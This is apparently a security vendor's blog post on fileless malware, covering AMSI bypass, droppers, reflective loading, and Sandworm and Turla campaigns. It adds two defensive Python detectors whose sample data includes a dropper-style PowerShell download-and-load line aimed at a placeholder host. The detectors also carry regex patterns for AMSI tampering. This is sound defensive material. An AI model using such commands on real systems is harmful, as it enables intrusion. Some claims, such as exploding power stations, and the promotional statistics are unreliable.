Over the past several decades, the cybersecurity industry has transformed rapidly through repeated periods of innovation. From desktop antivirus (AV) solutions in the 1990s, and next-generation antivirus solutions (NGAV) in the 2000s, to the somewhat recent appearance of Endpoint/Extended Detection and Response (EDR/XDR), it can be hard to understand what each solution does through the spray of acronym soup.
In a nutshell:
- Antivirus Products (AV) — These are what we generally think of as standalone desktop agents that provide most of the up-front protection a single machine needs. AVs use artificial intelligence (AI) to detect the previously observed signatures of known file-based malware. For example, if a trojan is downloaded from an email and execution is attempted, the AV scans the file’s binary representation to determine whether it has previously been associated with malicious activity. If it has, execution is stopped, the file is deleted, and an alert is sent to the user.
- Next-Generation Antivirus Products (NGAV) — These widen the aperture to protect against both known and unknown file-based malware. NGAVs also use AI to look for known malware signatures, but they add tools such as sandboxes to analyze the overall behavior of questionable files, looking for indicators of malicious interaction. For example, unknown file-based malware may make specific system calls, look for certain files, and incorporate anti-analysis protections. So even if a malicious file has not been seen before, the NGAV can still recognize it by scrutinizing its initial start-up and execution. If the program is determined to be malicious, execution is terminated and alerts are generated for the user.
- Endpoint/Extended Detection and Response (EDR/XDR) — These further expand the focus to include monitoring and response. Instead of just mitigating, EDRs and XDRs collect vast amounts of log event data from a fleet of endpoints, using AI to help cybersecurity personnel identify patterns of malicious behavior. If no indicator triggers the other protections and an attack is allowed to run, behavior monitoring picks up on telltale signs that the file is malignant as it moves through the system. The downside is that an intrusion has definitely occurred by that point, but now the monitoring security operations center (SOC) is aware and can begin to react and recover. EDR/XDRs are the most common types of cybersecurity solutions on the market today.
The Rise of Fileless Cyber Attacks
Current cyber solutions focus on (and are limited to) file-based malware. So, over the past few years, attackers have shifted to a stealthier, more evasive approach: embedding their malicious code within a program’s active memory. There is no download, no trace on the filesystem, and no recognizable signature or behavior for traditional solutions to detect. This allows attackers to hide in plain sight, disguised to the defender as normal, benign activity.
For a long time, fileless techniques were the domain of nation-states, requiring large teams and endless resources to support the development of this highly sophisticated software. However, as more and more exploits have been leaked, and more malware has been reverse-engineered, fileless techniques have become the staple of modern cyberattacks, increasing by 1400% since 2022. The current estimate is that 91% of ransomware samples use some kind of fileless component. And they’re affordable, with variants like XWorm and Bunny Loader available on the dark web for a few hundred dollars apiece.
There are many in-depth fileless resources available online, notably Alex Adomov’s lecture at VB 2023 illustrating the core aspects of these devastating attacks. Here, though, is a brief overview of their history and of their current and future impact.
Anatomy of a Fileless Attack
Fileless attacks can be broken down into three types.
- Type One — There is no file trace on the Operating System. Malware behavior is limited to the process memory space and does not interact with outside components. A common example of this is a PowerShell remote exploitation attack. In this case, a dropper is used to download an obfuscated and encoded DLL which is loaded and executed completely in PowerShell process memory.
- Type Two — Malware does not write files to disk, but some existing files may be used indirectly. For example, saving malicious code to the registry is a common practice for establishing malware persistence. Even though no file is created on the system, the registry still establishes a footprint that can be traced by the defender.
- Type Three — Malware requires some sort of file footprint to establish execution and persistence. For example, by creating a new task in the task scheduler or requiring a macro in a Word document to establish initial access, files can still assist the kill chain even though the actual malicious payload may not reside within the file itself.
Defense Evasion (MITRE ATT&CK Tactic TA0005)
Traditional defenses are great at what they were designed to do: scanning for the known patterns and signatures of previously observed malware. What makes fileless attacks so dangerous is their ability to circumvent everything traditional solutions know to do. These are some of the fileless techniques currently used to bypass and disable existing protections.
- AMSI Bypass — The Antimalware Scan Interface (AMSI) in newer versions of Windows allows AVs to scan executables and commands before they are run. Its DLL acts as an intermediary, passing content through every registered AV’s scan function to determine whether it is malicious. However, by patching the AMSI DLL code in runtime memory, attackers can effectively override the scanning process, disabling every installed cybersecurity solution’s ability to scan for malware.
- Remote Execution (Droppers) — AVs scan files and data structures in the filesystem for indicators of malware. However, modern fileless malware leverages remote execution to limit malicious code’s exposure to the target system. By leveraging a component called a dropper, attackers can insert a piece of stub code on the target system to disable existing protections before downloading the malicious code from a remote server. Since the downloaded code will be loaded and executed from the dropper or another benign program, no footprint will exist for scanners to detect.
- Obfuscation/Encryption — Most modern AI scanning models rely on plain-text patterns to detect malicious activity. This allows attackers to bypass traditional solutions by obfuscating commands, encrypting key data, or even doing something as simple as renaming a function.
- Reflective Code Loading — A common PowerShell technique is to load a DLL directly into memory and execute it. Often this is combined with a dropper that downloads an encoded DLL, which is then loaded into the current memory context and executed. Currently, MITRE only recommends monitoring for this command as a mitigation, leading to high false positive rates for monitoring solutions.
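The false-positive problem above comes from alerting on any one indicator in isolation. The following is an added example (not code from the original article or from ARMS Cyber) of the defender-side alternative: scoring the text of a PowerShell script block (the content of Windows Event ID 4104) against weighted indicators for each of the four evasion techniques just listed, and alerting only when several co-occur. The regexes, weights, threshold and sample script blocks are constructed for illustration; the placeholder URL and variable names are not real indicators of compromise.

```python
"""Weighted indicator scoring for PowerShell script-block telemetry.

Added example, not part of the original article. Each indicator below
maps to one of the evasion techniques discussed: AMSI tampering, remote
download (droppers), encoding/obfuscation and reflective assembly
loading. A single hit never alerts on its own; a dropper-style chain
that hits several does. Weights and threshold are constructed.
"""
import re
from dataclasses import dataclass, field

# Indicator regexes with weights. A benign admin script typically hits
# at most one of these; a download-decode-load chain hits several.
INDICATORS = {
    "amsi_tamper":     (re.compile(r"amsiInitFailed|AmsiUtils|AmsiScanBuffer", re.I), 5),
    "reflective_load": (re.compile(r"\[(System\.)?Reflection\.Assembly\]::Load\(", re.I), 3),
    "remote_download": (re.compile(r"DownloadString|DownloadData|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I), 3),
    "base64_decode":   (re.compile(r"FromBase64String", re.I), 2),
    "dynamic_eval":    (re.compile(r"Invoke-Expression|\biex\b", re.I), 2),
    "lolbin_host":     (re.compile(r"InstallUtil\.exe", re.I), 2),
}
ALERT_THRESHOLD = 6  # constructed: requires at least two strong indicators


@dataclass
class Verdict:
    score: int
    hits: list = field(default_factory=list)
    alert: bool = False


def score_script_block(text: str) -> Verdict:
    """Return the weighted indicator score and alert decision for one block."""
    hits, score = [], 0
    for name, (pattern, weight) in INDICATORS.items():
        if pattern.search(text):
            hits.append(name)
            score += weight
    return Verdict(score, hits, score >= ALERT_THRESHOLD)


# Constructed sample script blocks standing in for the ScriptBlockText
# field of Event ID 4104 records. URLs, paths and variables are made up.
SAMPLE_BLOCKS = {
    # Benign: an administrator loading a locally installed assembly by path.
    "admin_load_local": "[System.Reflection.Assembly]::LoadFrom('C:\\Program Files\\Vendor\\Tool.dll') | Out-Null",
    # Benign: a plain download to disk with no decoding or in-memory loading.
    "admin_download": "Invoke-WebRequest -Uri https://intranet.example/config.json -OutFile C:\\temp\\config.json",
    # Suspicious: download, base64-decode and reflectively load in one block (dropper shape).
    "dropper_chain": "$b=(New-Object Net.WebClient).DownloadString('http://placeholder.invalid/image.png');"
                     "[System.Reflection.Assembly]::Load([Convert]::FromBase64String($b))",
    # Suspicious: a reference to the AMSI helper type followed by dynamic evaluation.
    "amsi_then_eval": "$t='AmsiUtils'; iex $payload",
}


def triage(blocks=SAMPLE_BLOCKS):
    """Score every block and return, sorted, the names that cross the alert threshold."""
    return sorted(name for name, text in blocks.items() if score_script_block(text).alert)


if __name__ == "__main__":
    for name, text in SAMPLE_BLOCKS.items():
        v = score_script_block(text)
        print(f"{name:18} score={v.score:2} alert={v.alert} hits={v.hits}")
```

Note that the legitimate `LoadFrom` call and the plain file download each score below the threshold, while the two constructed chains cross it. In production the weights would be tuned against the organization's own baseline of administrative scripts, and the block text would come from the event log rather than an inline dictionary.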
Example 1: Sandworm APT
Sandworm is an element within the Russian intelligence service that is dedicated to executing the Kremlin’s most high-profile hacking efforts, often directed at their target’s critical infrastructure.
Some of the most devastating cyber-attacks in history have been spun out of the Sandworm group, mainly due to the utilization of fileless components. For example:
- Black Energy (2015) — A trojan developed to establish a DDoS capability within the Ukrainian energy sector infrastructure. The malware was initially launched through spear-phished Excel documents with an embedded macro that launched a PowerShell dropper. The attack left 230,000 residents without power and affected 2 of 3 distribution centers.
- Industroyer (2016) — Malware was spread throughout Industrial Control System (ICS) substations, completely opening every circuit and causing power stations to explode. This attack leveraged a combination of macros and remote execution for initial infection alongside a data wiper to remove traces of itself. This attack caused thousands of homes in Ukraine to lose power.
- NotPetya (2017) — The most damaging attack of its time, causing over $10 billion in damages. Intended for Ukrainian government facilities, the worm quickly spread across the globe, notably affecting Maersk, one of the world’s largest shipping companies, and Merck Pharmaceuticals, in addition to multiple hospitals and banks. Remote execution and obfuscated fileless droppers were used for the initial infection.
- Olympic Destroyer (2018) — This attack was intended to wipe out the Winter Olympics’ digital infrastructure during the Opening Ceremonies. Fortunately, it had little effect on the games, but a post-mortem analysis found several sophisticated evasion techniques, including polymorphic mutation, data wiping, and use of the NSA’s leaked EternalRomance exploit.
- WhisperGate (2022) — Deployed to destroy Ukrainian government systems during initial Russian hostilities. Similar to NotPetya, attackers successfully vandalized over 80 Ukrainian government websites.
As an exemplar for the anatomy of a Sandworm fileless attack, let’s take a closer look at the WhisperGate attack.
As seen above, WhisperGate malware can be broken down into two stages. Stage One uses an MBR wiper to destroy the disk, while in Stage Two a dropper downloads the file-wiper malware into PowerShell, where it is subsequently executed within memory.
In the attack process diagram for Stage Two, the dropper stub code downloads an image from a Discord CDN server. However, this image is actually an obfuscated .NET DLL storing the respective malware. At this point, the .NET DLL is injected into a benign Windows utility named InstallUtil.exe, where process hollowing is used to embed the malware within the program.
Once the DLL is loaded into memory, reflective loading is used to filelessly execute the respective malware without filesystem interaction. Then, because the initial payloads were disguised as images, downloaded remotely, and executed within benign processes, the attackers are able to bypass state-of-the-art commercial protections running on the systems.
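The hollowing and reflective loading themselves happen in memory, but the chain described above still leaves two observable facts in ordinary endpoint telemetry: a benign .NET utility is spawned by a scripting host, and that utility then opens an outbound connection to a content-delivery host it has no business contacting. The following is an added example (not code from the original article or from ARMS Cyber) that correlates constructed Sysmon-style process-creation and network-connection events to flag exactly that. The list of hosting candidates, the corporate allowlist, the PIDs, paths and destination hosts are all assumptions made for the example.

```python
"""Correlating process lineage with network activity to spot a benign
Windows utility hosting remotely fetched code.

Added example, not part of the original article. Events are constructed
stand-ins for Sysmon-style process-creation (Event ID 1) and network
(Event ID 3) records. Rule: a hosting candidate such as InstallUtil.exe
that was spawned by a scripting host, or that connected to a destination
outside the corporate allowlist, is flagged with the reasons recorded.
"""

# Legitimate Windows binaries commonly used to host code that never
# touches disk (assumption for this example; extend from your own baseline).
HOSTING_CANDIDATES = {"installutil.exe", "regsvcs.exe", "regasm.exe", "msbuild.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
# Destinations these binaries are expected to reach (constructed).
CORPORATE_ALLOWLIST = {"updates.corp.example", "repo.corp.example"}

PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
IU = "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe"

# Constructed telemetry: PIDs and hosts are made up; the CDN host is a placeholder.
EVENTS = [
    {"type": "process", "pid": 4120, "image": PS, "parent": "C:\\Windows\\explorer.exe"},
    # Suspicious lineage: InstallUtil.exe launched from PowerShell, then calls out to a CDN.
    {"type": "process", "pid": 4188, "image": IU, "parent": PS},
    {"type": "network", "pid": 4188, "image": IU, "dest": "cdn.placeholder.invalid", "port": 443},
    # Benign: InstallUtil.exe launched by an installer, talking to an allowlisted host.
    {"type": "process", "pid": 5010, "image": IU, "parent": "C:\\Windows\\System32\\msiexec.exe"},
    {"type": "network", "pid": 5010, "image": IU, "dest": "updates.corp.example", "port": 443},
    # Benign: a browser reaching the same CDN is not a hosting candidate.
    {"type": "network", "pid": 3300, "image": "C:\\Program Files\\Browser\\browser.exe",
     "dest": "cdn.placeholder.invalid", "port": 443},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def correlate(events):
    """Join network events to their creating process and return flagged findings."""
    procs = {e["pid"]: e for e in events if e["type"] == "process"}
    findings = []
    for e in events:
        if e["type"] != "network" or basename(e["image"]) not in HOSTING_CANDIDATES:
            continue
        proc = procs.get(e["pid"])
        parent = basename(proc["parent"]) if proc else None
        reasons = []
        if parent in SCRIPT_HOSTS:
            reasons.append(f"spawned by script host {parent}")
        if e["dest"] not in CORPORATE_ALLOWLIST:
            reasons.append(f"outbound to non-allowlisted host {e['dest']}")
        if reasons:
            findings.append({"pid": e["pid"], "image": basename(e["image"]),
                             "parent": parent, "dest": e["dest"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in correlate(EVENTS):
        print(f"pid={f['pid']} {f['image']} <- {f['parent']} -> {f['dest']}: {'; '.join(f['reasons'])}")
```

Only the PowerShell-spawned InstallUtil.exe instance is flagged, and on two independent grounds, which is what keeps the rule quiet on the installer-launched instance that legitimately reaches the update server. The rule sees the edges of the chain, not the in-memory hollowing itself, so it complements rather than replaces memory-level controls.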
Example 2: Turla APT
Turla APT, linked to the Russian Federal Security Service (FSB), has been active since at least 2004, targeting several high-profile government and defense organizations around the world, including:
- US Central Command (2008)
- Finnish Ministry of Foreign Affairs (2013)
- Swiss defense contractor RUAG (2014–2016)
- German Bundestag (2017–2018)
Similar to some of the Sandworm attacks, Turla used spear phishing to gain entry into target systems, with the lures disguised as Excel documents that were embedded with dropper macros.
Finally, the payload was downloaded as an obfuscated .NET assembly and executed within PowerShell process memory using the same reflection technique leveraged by Sandworm.
This resulted in a backdoor to the attacker command and control server, allowing for future interactions with the target system.
Fileless threats go beyond Government and Defense, affecting the Healthcare, Financial, Entertainment, and Transportation Sectors
It is critical to note how capable fileless attacks are at expanding beyond their initial targets. NotPetya was intended for the Ukrainian government, but organizations around the world were heavily compromised. Increasingly, hospitals, banks, schools and other services suffer the brunt of collateral damage. And while Sandworm and Turla are nation-state backed actors, it is crucial to understand that now even unsophisticated attackers have access to the same set of tools that once required a hostile nation’s cyber A-team.
Due to leaks, increased education and awareness, and open-source tools, fileless attack techniques have been trickling steadily onto the dark web, allowing cyber criminals to execute complex attacks at a fraction of the cost. Assisted by generative AI tools like WormGPT (ChatGPT for cyber-attacks), defense evasion and long-term persistence without detection are easier now than they have ever been.
Unlike hostile nations, criminals aren’t usually trying to accomplish a political agenda. They’re out to inflict maximum damage on a target that is likely to pay. Healthcare, financial, entertainment, transportation, manufacturing, education – the industry itself doesn’t matter. And whether it is the Rhysida attack which shut down 17 hospitals and 111 clinics, the Mr. Cooper attack which affected over four million customers, or the Caesar’s/MGM Casino attack which shut down operations for a week and a half, victims are faced with a simple but unthinkable choice: give in or watch their organizations burn to the ground.
The reactive nature of traditional solutions means that organizations must wait for an attack to occur before taking action, scanning for known signatures instead of proactively mitigating malicious activity. By continuously evolving and incorporating fileless techniques, attackers are able to stay one step ahead and maximize their criminal gain. Until defenders are equipped to stop attacks that leave no trace, fileless malware will continue its exponential growth.
How ARMS Cyber can help
Fileless attacks are dangerous because they allow attackers to evade traditional defenses. If an NGAV or EDR tool is completely circumvented or disabled, it doesn’t matter how good the AI detection or response capabilities are. To combat this, ARMS Cyber has built a cutting-edge Endpoint Protection Platform (EPP) solution which proactively detects and stops fileless attacks. We leverage a combination of runtime Moving Target Defenses (MTD), deception, command and behavior analysis, and anti-detonation based on fileless attacks’ core requirements. This allows us to recognize exploits earlier in the kill chain and with fewer false positives than other solutions. By preventing the fileless disablement of NGAV and EDR solutions, organizations can rest easy, knowing that their cyber investments are operating effectively without the risk of attacker evasion.